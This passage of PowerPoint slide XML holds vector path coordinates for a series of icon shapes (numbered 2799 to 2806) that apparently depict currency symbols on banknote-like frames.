                  <a:pt x="11570" y="7860"/>
                  <a:pt x="11463" y="7641"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11355" y="7420"/>
                  <a:pt x="11238" y="7311"/>
                  <a:pt x="11001" y="7311"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11001" y="9892"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11199" y="9990"/>
                  <a:pt x="11336" y="10104"/>
                  <a:pt x="11525" y="10235"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11714" y="10365"/>
                  <a:pt x="11881" y="10532"/>
                  <a:pt x="12026" y="10736"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12171" y="10940"/>
                  <a:pt x="12287" y="11193"/>
                  <a:pt x="12375" y="11495"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12463" y="11797"/>
                  <a:pt x="12507" y="12168"/>
                  <a:pt x="12507" y="12608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12507" y="13065"/>
                  <a:pt x="12466" y="13463"/>
                  <a:pt x="12385" y="13801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2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2"/>
                  <a:pt x="5671" y="3600"/>
                  <a:pt x="5400" y="36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799" name="Shape 2799"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="1464632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29"/>
                  <a:pt x="9939" y="12054"/>
                  <a:pt x="9982" y="12159"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10026" y="12263"/>
                  <a:pt x="10082" y="12351"/>
                  <a:pt x="10151" y="12425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9"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10605" y="10882"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10368" y="10882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8"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="11425" y="14199"/>
                  <a:pt x="11338" y="14135"/>
                  <a:pt x="11242" y="14086"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11145" y="14037"/>
                  <a:pt x="11102" y="13994"/>
                  <a:pt x="11001" y="13958"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11001" y="16096"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11238" y="16071"/>
                  <a:pt x="11377" y="15975"/>
                  <a:pt x="11528" y="15806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8"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12385" y="15751"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12304" y="16006"/>
                  <a:pt x="12193" y="16216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10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7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7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3"/>
                  <a:pt x="10605" y="16096"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10605" y="13875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10425" y="13807"/>
                  <a:pt x="10302" y="13726"/>
                  <a:pt x="10124" y="13631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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9165" y="11562"/>
                  <a:pt x="9206" y="11304"/>
                  <a:pt x="9287" y="11080"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9369" y="10857"/>
                  <a:pt x="9478" y="10670"/>
                  <a:pt x="9617" y="10520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7"/>
                  <a:pt x="10605" y="10057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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11199" y="10057"/>
                  <a:pt x="11329" y="10093"/>
                  <a:pt x="11505" y="10167"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11681" y="10240"/>
                  <a:pt x="11834" y="10350"/>
                  <a:pt x="11963" y="10498"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12093" y="10644"/>
                  <a:pt x="12196" y="10831"/>
                  <a:pt x="12273" y="11057"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12350" y="11284"/>
                  <a:pt x="12388" y="11547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0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11355" y="10965"/>
                  <a:pt x="11238" y="10882"/>
                  <a:pt x="11001" y="10882"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11001" y="12819"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11199" y="12894"/>
                  <a:pt x="11336" y="12978"/>
                  <a:pt x="11525" y="13076"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11714" y="13175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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12463" y="14248"/>
                  <a:pt x="12507" y="14526"/>
                  <a:pt x="12507" y="14857"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12507" y="15199"/>
                  <a:pt x="12466" y="15497"/>
                  <a:pt x="12385" y="15751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0" name="Shape 2800"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="2010590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0"/>
                  <a:pt x="10044" y="15701"/>
                  <a:pt x="9923" y="15861"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9802" y="16022"/>
                  <a:pt x="9660" y="16144"/>
                  <a:pt x="9499" y="16228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9362" y="16300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5"/>
                  <a:pt x="8316" y="16304"/>
                  <a:pt x="8171" y="16224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8001" y="16130"/>
                  <a:pt x="7856" y="15998"/>
                  <a:pt x="7736" y="15826"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7615" y="15655"/>
                  <a:pt x="7522" y="15443"/>
                  <a:pt x="7456" y="15193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7390" y="14942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2"/>
                  <a:pt x="8058" y="15015"/>
                  <a:pt x="8171" y="15236"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8270" y="15431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6"/>
                  <a:pt x="7636" y="12568"/>
                  <a:pt x="7561" y="12352"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7485" y="12136"/>
                  <a:pt x="7448" y="11868"/>
                  <a:pt x="7448" y="11548"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7448" y="11268"/>
                  <a:pt x="7483" y="11023"/>
                  <a:pt x="7553" y="10809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7622" y="10596"/>
                  <a:pt x="7716" y="10419"/>
                  <a:pt x="7835" y="10276"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7954" y="10134"/>
                  <a:pt x="8090" y="10024"/>
                  <a:pt x="8244" y="9948"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8373" y="9885"/>
                  <a:pt x="8479" y="9855"/>
                  <a:pt x="8606" y="9844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4"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9224" y="9853"/>
                  <a:pt x="9328" y="9881"/>
                  <a:pt x="9453" y="9939"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9605" y="10009"/>
                  <a:pt x="9735" y="10114"/>
                  <a:pt x="9847" y="10255"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9957" y="10394"/>
                  <a:pt x="10046" y="10572"/>
                  <a:pt x="10112" y="10788"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10178" y="11003"/>
                  <a:pt x="10211" y="11254"/>
                  <a:pt x="10211" y="11540"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9567" y="11540"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9559" y="11242"/>
                  <a:pt x="9509" y="11015"/>
                  <a:pt x="9417" y="10857"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9339" y="10725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5"/>
                  <a:pt x="9336" y="12633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5"/>
                  <a:pt x="10200" y="13610"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10275" y="13827"/>
                  <a:pt x="10312" y="14091"/>
                  <a:pt x="10312" y="14407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10312" y="14732"/>
                  <a:pt x="10278" y="15016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6"/>
                  <a:pt x="6938" y="18514"/>
                  <a:pt x="8836" y="18514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10734" y="18514"/>
                  <a:pt x="12273" y="16096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0"/>
                  <a:pt x="3927" y="1543"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3927" y="2314"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="2740"/>
                  <a:pt x="4147" y="3086"/>
                  <a:pt x="4418" y="3086"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4689" y="3086"/>
                  <a:pt x="4909" y="2740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0"/>
                  <a:pt x="21600" y="15429"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="1543"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="690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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9175" y="13642"/>
                  <a:pt x="9137" y="13616"/>
                  <a:pt x="9097" y="13590"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9097" y="15560"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9250" y="15523"/>
                  <a:pt x="9363" y="15447"/>
                  <a:pt x="9473" y="15311"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9604" y="15151"/>
                  <a:pt x="9668" y="14896"/>
                  <a:pt x="9668" y="14545"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9668" y="14383"/>
                  <a:pt x="9649" y="14246"/>
                  <a:pt x="9609" y="14135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7"/>
                  <a:pt x="14762" y="19814"/>
                  <a:pt x="14817" y="20057"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2855" y="20057"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2910" y="19814"/>
                  <a:pt x="2945" y="19557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5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1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1"/>
                  <a:pt x="14727" y="6943"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="8221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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="9115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8"/>
                  <a:pt x="8149" y="11836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0"/>
                  <a:pt x="8419" y="12217"/>
                  <a:pt x="8496" y="12260"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8542" y="12286"/>
                  <a:pt x="8573" y="12310"/>
                  <a:pt x="8606" y="12330"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8606" y="10637"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8457" y="10653"/>
                  <a:pt x="8353" y="10708"/>
                  <a:pt x="8258" y="10818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8147" y="10949"/>
                  <a:pt x="8092" y="11170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1" name="Shape 2801"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120" y="2023286"/>
            <a:ext cx="279328" cy="152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6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11671" y="10299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9907" y="10299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2"/>
                  <a:pt x="9902" y="11100"/>
                  <a:pt x="9907" y="11141"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11570" y="11141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9"/>
                  <a:pt x="10123" y="13114"/>
                  <a:pt x="10311" y="13494"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10527" y="13964"/>
                  <a:pt x="10819" y="14199"/>
                  <a:pt x="11189" y="14199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11429" y="14199"/>
                  <a:pt x="11628" y="14134"/>
                  <a:pt x="11786" y="14001"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11930" y="13878"/>
                  <a:pt x="12093" y="13671"/>
                  <a:pt x="12276" y="13382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7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9372" y="13700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1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9065" y="11141"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9060" y="11083"/>
                  <a:pt x="9056" y="11022"/>
                  <a:pt x="9054" y="10955"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9051" y="10889"/>
                  <a:pt x="9050" y="10819"/>
                  <a:pt x="9050" y="10744"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9050" y="10687"/>
                  <a:pt x="9051" y="10620"/>
                  <a:pt x="9054" y="10547"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9056" y="10472"/>
                  <a:pt x="9060" y="10389"/>
                  <a:pt x="9065" y="10299"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8546" y="10299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8734" y="9506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9115" y="9506"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9235" y="8557"/>
                  <a:pt x="9453" y="7806"/>
                  <a:pt x="9770" y="7253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10140" y="6617"/>
                  <a:pt x="10612" y="6299"/>
                  <a:pt x="11189" y="6299"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11606" y="6299"/>
                  <a:pt x="12034" y="6555"/>
                  <a:pt x="12470" y="7066"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="12139" y="8193"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11832" y="7666"/>
                  <a:pt x="11496" y="7401"/>
                  <a:pt x="11131" y="7401"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10809" y="7401"/>
                  <a:pt x="10541" y="7620"/>
                  <a:pt x="10325" y="8058"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10142" y="8445"/>
                  <a:pt x="10020" y="8929"/>
                  <a:pt x="9957" y="9506"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9957" y="9506"/>
                  <a:pt x="11858" y="9506"/>
                  <a:pt x="11858" y="9506"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="10800" y="3601"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="8631" y="3601"/>
                  <a:pt x="6873" y="6824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4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3"/>
                  <a:pt x="3927" y="4501"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="4998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8"/>
                  <a:pt x="5891" y="4501"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="4003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8"/>
                  <a:pt x="19636" y="2701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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="3198"/>
                  <a:pt x="20398" y="3601"/>
                  <a:pt x="20127" y="3601"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="20618" y="16365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9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9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1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1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2"/>
                  <a:pt x="19856" y="18000"/>
                  <a:pt x="20127" y="18000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20398" y="18000"/>
                  <a:pt x="20618" y="18402"/>
                  <a:pt x="20618" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="19397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7"/>
                  <a:pt x="982" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="18402"/>
                  <a:pt x="1202" y="18000"/>
                  <a:pt x="1473" y="18000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1744" y="18000"/>
                  <a:pt x="1964" y="18402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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="3198"/>
                  <a:pt x="1744" y="3601"/>
                  <a:pt x="1473" y="3601"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1202" y="3601"/>
                  <a:pt x="982" y="3198"/>
                  <a:pt x="982" y="2701"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="2203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2" name="Shape 2802"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381" y="19978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29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5"/>
                  <a:pt x="9900" y="13198"/>
                  <a:pt x="9900" y="13254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0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9943" y="14340"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10001" y="14842"/>
                  <a:pt x="10124" y="15236"/>
                  <a:pt x="10311" y="15520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0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6"/>
                  <a:pt x="9177" y="15084"/>
                  <a:pt x="9101" y="14340"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8547" y="14340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8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4"/>
                  <a:pt x="9060" y="13192"/>
                  <a:pt x="9065" y="13124"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8547" y="13124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8734" y="12529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9115" y="12529"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9235" y="11818"/>
                  <a:pt x="9453" y="11254"/>
                  <a:pt x="9770" y="10840"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10140" y="10363"/>
                  <a:pt x="10613" y="10124"/>
                  <a:pt x="11189" y="10124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11607" y="10124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50"/>
                  <a:pt x="11496" y="10951"/>
                  <a:pt x="11131" y="10951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10809" y="10951"/>
                  <a:pt x="10541" y="11115"/>
                  <a:pt x="10325" y="11443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10143" y="11734"/>
                  <a:pt x="10020" y="12097"/>
                  <a:pt x="9958" y="12529"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9958" y="12529"/>
                  <a:pt x="11858" y="12529"/>
                  <a:pt x="11858" y="12529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3" name="Shape 2803"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642" y="2010590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5"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8165" y="13232"/>
                  <a:pt x="8167" y="13320"/>
                  <a:pt x="8171" y="13348"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9418" y="13348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9283" y="13883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8198" y="13883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70"/>
                  <a:pt x="8003" y="15505"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7769" y="15104"/>
                  <a:pt x="7623" y="14562"/>
                  <a:pt x="7566" y="13883"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7150" y="13883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7"/>
                  <a:pt x="7530" y="13221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7529" y="13175"/>
                  <a:pt x="7528" y="13127"/>
                  <a:pt x="7528" y="13077"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7528" y="13037"/>
                  <a:pt x="7529" y="12991"/>
                  <a:pt x="7530" y="12941"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7532" y="12890"/>
                  <a:pt x="7536" y="12833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8"/>
                  <a:pt x="9132" y="10028"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9445" y="10028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5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0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0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60"/>
                  <a:pt x="1202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7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7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7"/>
                  <a:pt x="13525" y="16971"/>
                  <a:pt x="13255" y="169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4" name="Shape 2804"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903" y="2023287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6"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10458" y="13273"/>
                  <a:pt x="11518" y="13902"/>
                  <a:pt x="11675" y="12740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2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3"/>
                  <a:pt x="11059" y="8378"/>
                  <a:pt x="10772" y="8246"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="12833" y="9742"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="12767" y="10572"/>
                  <a:pt x="12517" y="10974"/>
                  <a:pt x="12186" y="11116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12641" y="11552"/>
                  <a:pt x="12872" y="12224"/>
                  <a:pt x="12652" y="13386"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12378" y="14828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6"/>
                  <a:pt x="10088" y="14311"/>
                  <a:pt x="9949" y="14242"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9741" y="15780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9235" y="15548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9444" y="13993"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9326" y="13936"/>
                  <a:pt x="9206" y="13877"/>
                  <a:pt x="9083" y="13820"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8423" y="13517"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8675" y="12446"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8675" y="12446"/>
                  <a:pt x="9049" y="12629"/>
                  <a:pt x="9043" y="12615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7" y="9940"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9626" y="9949"/>
                  <a:pt x="9644" y="9957"/>
                  <a:pt x="9661" y="9965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9641" y="9950"/>
                  <a:pt x="9623" y="9940"/>
                  <a:pt x="9608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8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5" y="6471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10074" y="6793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10074" y="6798"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10179" y="6845"/>
                  <a:pt x="10288" y="6892"/>
                  <a:pt x="10398" y="6937"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10606" y="5401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7"/>
                  <a:pt x="11182" y="7255"/>
                  <a:pt x="11315" y="7317"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11517" y="5821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7"/>
                  <a:pt x="12833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8" y="16200"/>
                  <a:pt x="15709" y="16603"/>
                  <a:pt x="15709" y="17100"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15709" y="17598"/>
                  <a:pt x="15928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8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8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8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8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8" y="1800"/>
                  <a:pt x="20618" y="2203"/>
                  <a:pt x="20618" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="3198"/>
                  <a:pt x="20398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10"/>
                  <a:pt x="18655" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18655" y="19217"/>
                  <a:pt x="18690" y="19518"/>
                  <a:pt x="18744" y="19800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2855" y="19800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2910" y="19518"/>
                  <a:pt x="2945" y="19217"/>
                  <a:pt x="2945" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="17410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6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90" y="2083"/>
                  <a:pt x="18655" y="2383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6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8"/>
                  <a:pt x="19636" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19636" y="18403"/>
                  <a:pt x="19856" y="18000"/>
                  <a:pt x="20127" y="18000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20398" y="18000"/>
                  <a:pt x="20618" y="18403"/>
                  <a:pt x="20618" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="19398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8"/>
                  <a:pt x="982" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="18403"/>
                  <a:pt x="1201" y="18000"/>
                  <a:pt x="1473" y="18000"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1744" y="18000"/>
                  <a:pt x="1964" y="18403"/>
                  <a:pt x="1964" y="18900"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1964" y="19398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8"/>
                  <a:pt x="1744" y="3600"/>
                  <a:pt x="1473" y="3600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1201" y="3600"/>
                  <a:pt x="982" y="3198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6"/>
                  <a:pt x="0" y="1800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="19800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="20794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4"/>
                  <a:pt x="21600" y="19800"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="1800"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="806"/>
                  <a:pt x="21160" y="0"/>
                  <a:pt x="2061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5" name="Shape 2805"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="19978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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10458" y="15355"/>
                  <a:pt x="11518" y="15826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29"/>
                  <a:pt x="12517" y="13631"/>
                  <a:pt x="12186" y="13737"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12641" y="14064"/>
                  <a:pt x="12873" y="14567"/>
                  <a:pt x="12652" y="15439"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12378" y="16521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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10222" y="16182"/>
                  <a:pt x="10088" y="16133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5"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9608" y="12855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9626" y="12862"/>
                  <a:pt x="9645" y="12868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200"/>
                  <a:pt x="9609" y="11129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9617" y="11121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3"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10606" y="9451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11113" y="9626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10909" y="10755"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11045" y="10798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8"/>
                  <a:pt x="12926" y="11855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3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3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2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7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7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2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4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4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5"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10807" y="13084"/>
                  <a:pt x="11689" y="13487"/>
                  <a:pt x="11832" y="12694"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11981" y="11867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6" name="Shape 2806"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="2010590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40"/>
                  <a:pt x="9938" y="13340"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10292" y="13653"/>
                  <a:pt x="10472" y="14131"/>
                  <a:pt x="10300" y="14961"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10088" y="15991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5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8513" y="15711"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8411" y="15668"/>
                  <a:pt x="8306" y="15622"/>
                  <a:pt x="8199" y="15573"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8037" y="16672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7643" y="16505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7806" y="15395"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7714" y="15355"/>
                  <a:pt x="7621" y="15312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9"/>
                  <a:pt x="7656" y="14335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2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5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49"/>
                  <a:pt x="7647" y="10735"/>
                  <a:pt x="7647" y="10735"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7752" y="10022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8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2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2"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10149" y="11112"/>
                  <a:pt x="10513" y="11548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2"/>
                  <a:pt x="5400" y="13114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5400" y="16097"/>
                  <a:pt x="6938" y="18514"/>
                  <a:pt x="8836" y="18514"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10734" y="18514"/>
                  <a:pt x="12273" y="16097"/>
                  <a:pt x="12273" y="13114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="10132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4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4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1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1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7"/>
                  <a:pt x="15929" y="6171"/>
                  <a:pt x="16200" y="6171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="6171"/>
